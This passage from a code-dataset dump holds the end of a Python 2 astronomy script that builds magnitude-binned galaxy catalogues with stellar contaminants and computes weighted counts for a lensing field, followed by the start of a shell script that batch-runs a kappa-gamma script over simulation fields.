(rmag__ugrizJHK <= 21)].size\n count215 = posx__ugrizJHK[(rmag__ugrizJHK > 21) & (rmag__ugrizJHK <= 21.5)].size\n count22 = posx__ugrizJHK[(rmag__ugrizJHK > 21.5) & (rmag__ugrizJHK <= 22)].size\n count225 = posx__ugrizJHK[(rmag__ugrizJHK > 22) & (rmag__ugrizJHK <= 22.5)].size\n count23 = posx__ugrizJHK[(rmag__ugrizJHK > 22.5) & (rmag__ugrizJHK <= 23)].size\n count235 = posx__ugrizJHK[(rmag__ugrizJHK > 23) & (rmag__ugrizJHK <= 23.5)].size\n count24 = posx__ugrizJHK[(rmag__ugrizJHK > 23.5) & (rmag__ugrizJHK <= 24)].size\n #print count18,count185,count19,count195,count20,count205,count21,count215,count22,count225,count23,count235,count24\n\n posxmin = np.min(posx__ugrizJHK) # used to insert random stellar contaminants\n posxmax = np.max(posx__ugrizJHK)\n posymin = np.min(posy__ugrizJHK)\n posymax = np.max(posy__ugrizJHK)\n\n # generate the stellar contaminants\n cont_18,cont_posx_18,cont_posy_18,cont_rmag_18 = contaminants(count18,cont_ugrizJHK_18,posxmin,posxmax,posymin,posymax,star_rmag_18)\n cont_185,cont_posx_185,cont_posy_185,cont_rmag_185 = contaminants(count185,cont_ugrizJHK_185,posxmin,posxmax,posymin,posymax,star_rmag_185)\n cont_19,cont_posx_19,cont_posy_19,cont_rmag_19 = contaminants(count19,cont_ugrizJHK_19,posxmin,posxmax,posymin,posymax,star_rmag_19)\n cont_195,cont_posx_195,cont_posy_195,cont_rmag_195 = contaminants(count195,cont_ugrizJHK_195,posxmin,posxmax,posymin,posymax,star_rmag_195)\n cont_20,cont_posx_20,cont_posy_20,cont_rmag_20 = contaminants(count20,cont_ugrizJHK_20,posxmin,posxmax,posymin,posymax,star_rmag_20)\n cont_205,cont_posx_205,cont_posy_205,cont_rmag_205 = contaminants(count205,cont_ugrizJHK_205,posxmin,posxmax,posymin,posymax,star_rmag_205)\n cont_21,cont_posx_21,cont_posy_21,cont_rmag_21 = contaminants(count21,cont_ugrizJHK_21,posxmin,posxmax,posymin,posymax,star_rmag_21)\n cont_215,cont_posx_215,cont_posy_215,cont_rmag_215 = contaminants(count215,cont_ugrizJHK_215,posxmin,posxmax,posymin,posymax,star_rmag_215)\n cont_22,cont_posx_22,cont_posy_22,cont_rmag_22 = contaminants(count22,cont_ugrizJHK_22,posxmin,posxmax,posymin,posymax,star_rmag_22)\n cont_225,cont_posx_225,cont_posy_225,cont_rmag_225 = contaminants(count225,cont_ugrizJHK_225,posxmin,posxmax,posymin,posymax,star_rmag_225)\n cont_23,cont_posx_23,cont_posy_23,cont_rmag_23 = contaminants(count23,cont_ugrizJHK_23,posxmin,posxmax,posymin,posymax,star_rmag_23)\n cont_235,cont_posx_235,cont_posy_235,cont_rmag_235 = contaminants(count235,cont_ugrizJHK_235,posxmin,posxmax,posymin,posymax,star_rmag_235)\n cont_24,cont_posx_24,cont_posy_24,cont_rmag_24 = contaminants(count24,cont_ugrizJHK_24,posxmin,posxmax,posymin,posymax,star_rmag_24)\n #print cont_18.size,cont_185.size,cont_19.size,cont_195.size,cont_20.size,cont_205.size,cont_21.size,cont_215.size,cont_22.size,cont_225.size,cont_23.size,cont_235.size,cont_24.size\n\n # masking the fraction of galaxies expected to not be detected as galaxies, due to incompleteness; here also apply the brightmag, limmag, z_s and z gap cuts\n posx__ugrizJHK = posx__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag) & (((rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= 18)) | ((rmag__ugrizJHK > 18) & (rmag__ugrizJHK <= 18.5)) | ((rmag__ugrizJHK > 18.5) & (rmag__ugrizJHK <= 19)) | ((rmag__ugrizJHK > 19) & (rmag__ugrizJHK <= 19.5)) | ((rmag__ugrizJHK > 19.5) & (rmag__ugrizJHK <= 20)) | ((rmag__ugrizJHK > 20) & (rmag__ugrizJHK <= 20.5)) | ((rmag__ugrizJHK > 20.5) & (rmag__ugrizJHK <= 21)) | ((rmag__ugrizJHK > 21) & (rmag__ugrizJHK <= 21.5)) | ((rmag__ugrizJHK > 21.5) & (rmag__ugrizJHK <= 22)) | ((rmag__ugrizJHK > 22) & (rmag__ugrizJHK <= 22.5)) | ((rmag__ugrizJHK > 22.5) & (rmag__ugrizJHK <= 23)) | ((rmag__ugrizJHK > 23) & (rmag__ugrizJHK <= 23.5)) | ((rmag__ugrizJHK > 23.5) & (rmag__ugrizJHK <= 24)))]\n posy__ugrizJHK = posy__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag) & (((rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= 18)) | ((rmag__ugrizJHK > 18) & (rmag__ugrizJHK <= 18.5)) | ((rmag__ugrizJHK > 18.5) & (rmag__ugrizJHK <= 19)) | ((rmag__ugrizJHK > 19) & (rmag__ugrizJHK <= 19.5)) | ((rmag__ugrizJHK > 19.5) & (rmag__ugrizJHK <= 20)) | ((rmag__ugrizJHK > 20) & (rmag__ugrizJHK <= 20.5)) | ((rmag__ugrizJHK > 20.5) & (rmag__ugrizJHK <= 21)) | ((rmag__ugrizJHK > 21) & (rmag__ugrizJHK <= 21.5)) | ((rmag__ugrizJHK > 21.5) & (rmag__ugrizJHK <= 22)) | ((rmag__ugrizJHK > 22) & (rmag__ugrizJHK <= 22.5)) | ((rmag__ugrizJHK > 22.5) & (rmag__ugrizJHK <= 23)) | ((rmag__ugrizJHK > 23) & (rmag__ugrizJHK <= 23.5)) | ((rmag__ugrizJHK > 23.5) & (rmag__ugrizJHK <= 24)))]\n rmag__ugrizJHK = rmag__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag) & (((rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= 18)) | ((rmag__ugrizJHK > 18) & (rmag__ugrizJHK <= 18.5)) | ((rmag__ugrizJHK > 18.5) & (rmag__ugrizJHK <= 19)) | ((rmag__ugrizJHK > 19) & (rmag__ugrizJHK <= 19.5)) | ((rmag__ugrizJHK > 19.5) & (rmag__ugrizJHK <= 20)) | ((rmag__ugrizJHK > 20) & (rmag__ugrizJHK <= 20.5)) | ((rmag__ugrizJHK > 20.5) & (rmag__ugrizJHK <= 21)) | ((rmag__ugrizJHK > 21) & (rmag__ugrizJHK <= 21.5)) | ((rmag__ugrizJHK > 21.5) & (rmag__ugrizJHK <= 22)) | ((rmag__ugrizJHK > 22) & (rmag__ugrizJHK <= 22.5)) | ((rmag__ugrizJHK > 22.5) & (rmag__ugrizJHK <= 23)) | ((rmag__ugrizJHK > 23) & (rmag__ugrizJHK <= 23.5)) | ((rmag__ugrizJHK > 23.5) & (rmag__ugrizJHK <= 24)))]\n\n # inserting the stellar contaminants\n if limmag == 22.5:\n posx_ugrizJHK = np.concatenate((posx_ugrizJHK,posx__ugrizJHK,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225))\n if limmag == 23:\n posx_ugrizJHK = np.concatenate((posx_ugrizJHK,posx__ugrizJHK,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23))\n if limmag == 23.5:\n posx_ugrizJHK = np.concatenate((posx_ugrizJHK,posx__ugrizJHK,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23,cont_posx_235))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23,cont_posy_235))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23,cont_rmag_235))\n if limmag == 24:\n posx_ugrizJHK = np.concatenate((posx_ugrizJHK,posx__ugrizJHK,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23,cont_posx_235,cont_posx_24))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23,cont_posy_235,cont_posy_24))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23,cont_rmag_235,cont_rmag_24))\n #if len(rmag_ugrizJHK) > 0: print np.max(rmag_ugrizJHK)\n\n # repeat for ugriz catalogues\n\n count18 = posx__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= 18)].size\n count185 = posx__ugriz[(rmag__ugriz > 18) & (rmag__ugriz <= 18.5)].size\n count19 = posx__ugriz[(rmag__ugriz > 18.5) & (rmag__ugriz <= 19)].size\n count195 = posx__ugriz[(rmag__ugriz > 19) & (rmag__ugriz <= 19.5)].size\n count20 = posx__ugriz[(rmag__ugriz > 19.5) & (rmag__ugriz <= 20)].size\n count205 = posx__ugriz[(rmag__ugriz > 20) & (rmag__ugriz <= 20.5)].size\n count21 = posx__ugriz[(rmag__ugriz > 20.5) & (rmag__ugriz <= 21)].size\n count215 = posx__ugriz[(rmag__ugriz > 21) & (rmag__ugriz <= 21.5)].size\n count22 = posx__ugriz[(rmag__ugriz > 21.5) & (rmag__ugriz <= 22)].size\n count225 = posx__ugriz[(rmag__ugriz > 22) & (rmag__ugriz <= 22.5)].size\n count23 = posx__ugriz[(rmag__ugriz > 22.5) & (rmag__ugriz <= 23)].size\n count235 = posx__ugriz[(rmag__ugriz > 23) & (rmag__ugriz <= 23.5)].size\n count24 = posx__ugriz[(rmag__ugriz > 23.5) & (rmag__ugriz <= 24)].size\n\n # generate the stellar contaminants\n cont_18,cont_posx_18,cont_posy_18,cont_rmag_18 = contaminants(count18,cont_ugriz_18,posxmin,posxmax,posymin,posymax,star_rmag_18)\n cont_185,cont_posx_185,cont_posy_185,cont_rmag_185 = contaminants(count185,cont_ugriz_185,posxmin,posxmax,posymin,posymax,star_rmag_185)\n cont_19,cont_posx_19,cont_posy_19,cont_rmag_19 = contaminants(count19,cont_ugriz_19,posxmin,posxmax,posymin,posymax,star_rmag_19)\n cont_195,cont_posx_195,cont_posy_195,cont_rmag_195 = contaminants(count195,cont_ugriz_195,posxmin,posxmax,posymin,posymax,star_rmag_195)\n cont_20,cont_posx_20,cont_posy_20,cont_rmag_20 = contaminants(count20,cont_ugriz_20,posxmin,posxmax,posymin,posymax,star_rmag_20)\n cont_205,cont_posx_205,cont_posy_205,cont_rmag_205 = contaminants(count205,cont_ugriz_205,posxmin,posxmax,posymin,posymax,star_rmag_205)\n cont_21,cont_posx_21,cont_posy_21,cont_rmag_21 = contaminants(count21,cont_ugriz_21,posxmin,posxmax,posymin,posymax,star_rmag_21)\n cont_215,cont_posx_215,cont_posy_215,cont_rmag_215 = contaminants(count215,cont_ugriz_215,posxmin,posxmax,posymin,posymax,star_rmag_215)\n cont_22,cont_posx_22,cont_posy_22,cont_rmag_22 = contaminants(count22,cont_ugriz_22,posxmin,posxmax,posymin,posymax,star_rmag_22)\n cont_225,cont_posx_225,cont_posy_225,cont_rmag_225 = contaminants(count225,cont_ugriz_225,posxmin,posxmax,posymin,posymax,star_rmag_225)\n cont_23,cont_posx_23,cont_posy_23,cont_rmag_23 = contaminants(count23,cont_ugriz_23,posxmin,posxmax,posymin,posymax,star_rmag_23)\n cont_235,cont_posx_235,cont_posy_235,cont_rmag_235 = contaminants(count235,cont_ugriz_235,posxmin,posxmax,posymin,posymax,star_rmag_235)\n cont_24,cont_posx_24,cont_posy_24,cont_rmag_24 = contaminants(count24,cont_ugriz_24,posxmin,posxmax,posymin,posymax,star_rmag_24)\n\n posx__ugriz = posx__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag) & (((rmag__ugriz > brightmag) & (rmag__ugriz <= 18)) | ((rmag__ugriz > 18) & (rmag__ugriz <= 18.5)) | ((rmag__ugriz > 18.5) & (rmag__ugriz <= 19)) | ((rmag__ugriz > 19) & (rmag__ugriz <= 19.5)) | ((rmag__ugriz > 19.5) & (rmag__ugriz <= 20)) | ((rmag__ugriz > 20) & (rmag__ugriz <= 20.5)) | ((rmag__ugriz > 20.5) & (rmag__ugriz <= 21)) | ((rmag__ugriz > 21) & (rmag__ugriz <= 21.5)) | ((rmag__ugriz > 21.5) & (rmag__ugriz <= 22)) | ((rmag__ugriz > 22) & (rmag__ugriz <= 22.5)) | ((rmag__ugriz > 22.5) & (rmag__ugriz <= 23)) | ((rmag__ugriz > 23) & (rmag__ugriz <= 23.5)) | ((rmag__ugriz > 23.5) & (rmag__ugriz <= 24)))]\n posy__ugriz = posy__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag) & (((rmag__ugriz > brightmag) & (rmag__ugriz <= 18)) | ((rmag__ugriz > 18) & (rmag__ugriz <= 18.5)) | ((rmag__ugriz > 18.5) & (rmag__ugriz <= 19)) | ((rmag__ugriz > 19) & (rmag__ugriz <= 19.5)) | ((rmag__ugriz > 19.5) & (rmag__ugriz <= 20)) | ((rmag__ugriz > 20) & (rmag__ugriz <= 20.5)) | ((rmag__ugriz > 20.5) & (rmag__ugriz <= 21)) | ((rmag__ugriz > 21) & (rmag__ugriz <= 21.5)) | ((rmag__ugriz > 21.5) & (rmag__ugriz <= 22)) | ((rmag__ugriz > 22) & (rmag__ugriz <= 22.5)) | ((rmag__ugriz > 22.5) & (rmag__ugriz <= 23)) | ((rmag__ugriz > 23) & (rmag__ugriz <= 23.5)) | ((rmag__ugriz > 23.5) & (rmag__ugriz <= 24)))]\n rmag__ugriz = rmag__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag) & (((rmag__ugriz > brightmag) & (rmag__ugriz <= 18)) | ((rmag__ugriz > 18) & (rmag__ugriz <= 18.5)) | ((rmag__ugriz > 18.5) & (rmag__ugriz <= 19)) | ((rmag__ugriz > 19) & (rmag__ugriz <= 19.5)) | ((rmag__ugriz > 19.5) & (rmag__ugriz <= 20)) | ((rmag__ugriz > 20) & (rmag__ugriz <= 20.5)) | ((rmag__ugriz > 20.5) & (rmag__ugriz <= 21)) | ((rmag__ugriz > 21) & (rmag__ugriz <= 21.5)) | ((rmag__ugriz > 21.5) & (rmag__ugriz <= 22)) | ((rmag__ugriz > 22) & (rmag__ugriz <= 22.5)) | ((rmag__ugriz > 22.5) & (rmag__ugriz <= 23)) | ((rmag__ugriz > 23) & (rmag__ugriz <= 23.5)) | ((rmag__ugriz > 23.5) & (rmag__ugriz <= 24)))]\n\n if limmag == 22.5:\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225))\n rmag_ugriz = np.concatenate((rmag_ugriz,rmag__ugriz,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225))\n if limmag == 23:\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23))\n rmag_ugriz = np.concatenate((rmag_ugriz,rmag__ugriz,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23))\n if limmag == 23.5:\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23,cont_posx_235))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23,cont_posy_235))\n rmag_ugriz = np.concatenate((rmag_ugriz,rmag__ugriz,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23,cont_rmag_235))\n if limmag == 24:\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23,cont_posx_235,cont_posx_24))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23,cont_posy_235,cont_posy_24))\n rmag_ugriz = np.concatenate((rmag_ugriz,rmag__ugriz,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23,cont_rmag_235,cont_rmag_24))\n #if len(rmag_ugriz) > 0: print np.max(rmag_ugriz)\n\n else:\n posx__ugrizJHK = posx__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag)]\n posy__ugrizJHK = posy__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag)]\n rmag__ugrizJHK = rmag__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag)]\n posx_ugrizJHK = np.concatenate((posx_ugrizJHK,posx__ugrizJHK))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK))\n\n posx__ugriz = posx__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag)]\n posy__ugriz = posy__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag)]\n rmag__ugriz = rmag__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag)]\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz))\n rmag_ugriz = np.concatenate((rmag_ugriz,rmag__ugriz))\n\ncat_ugrizJHK = np.c_[posx_ugrizJHK,posy_ugrizJHK,rmag_ugrizJHK]\ndel posx_ugrizJHK\ndel posy_ugrizJHK\ndel rmag_ugrizJHK\ndel posx__ugrizJHK\ndel posy__ugrizJHK\ndel rmag__ugrizJHK\ncat_ugriz = np.c_[posx_ugriz,posy_ugriz,rmag_ugriz]\ndel posx_ugriz\ndel posy_ugriz\ndel rmag_ugriz\ndel posx__ugriz\ndel posy__ugriz\ndel rmag__ugriz\n\nindex_posx = 0\nindex_posy = 1\nindex_rmag = 2\nindex_sep = -1\nindex_index = -2\n\nprint \"Read galaxy catalogues in \", time.time() - start_readcat, \"seconds\"\n\n############################\n# compute and write weighted counts\n############################\n\ndegree = np.pi / 180\nL_field = 4.0 * degree\nN_pix_per_dim = 4096\nL_pix = L_field / N_pix_per_dim\npixscl_asec = 4.0 * 3600 / 4096 # kappa pixel size in arcsec\npixscl_rad = pixscl_asec * degree / 3600 # kappa pixel size in radian\n\n# divide the field into cells and compute weighted counts\nstart_weights = time.time()\n\nlim1D = int(radius / pixscl_asec) + 1 # number of kappa pixels that should be ignored at the edge of the field so that the field can be covered by full cells\nspacing = int(2.0 * radius / pixscl_asec + 1) # number of pixels between each pixels considered as cell center; in order for the cells not to overlap, the grid spacing should be at least this large\ncells_on_a_side = int(1.0 * (4096 - 2 * lim1D) / spacing)\ncells = np.linspace(0,cells_on_a_side**2 - 1,cells_on_a_side**2)\nstart_radius = time.time()\n\ncat = cat_ugrizJHK\nbands = \"ugrizJHK\"\nweightedcounts(cat,spacing,lim1D,cells_on_a_side,L_field,L_pix,cells,kappagamma,pln,bands)\n\ncat = cat_ugriz\nbands = \"ugriz\"\nweightedcounts(cat,spacing,lim1D,cells_on_a_side,L_field,L_pix,cells,kappagamma,pln,bands)\n\nprint \"Computed weights in \", time.time() - start_weights, \"seconds\"\n\nprint(\" Field done in --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6555031538009644, "alphanum_fraction": 0.7803609371185303, "avg_line_length": 85.63380432128906, "blob_id": "7b83643326094704c33b661d2a9706a82af68fc6", "content_id": "7b74b66470dfa8d76c7c67e70b5e1795226bff5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 6151, "license_type": "no_license", "max_line_length": 95, "num_lines": 71, "path": "/python/scripts/NAOJ/screen.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py 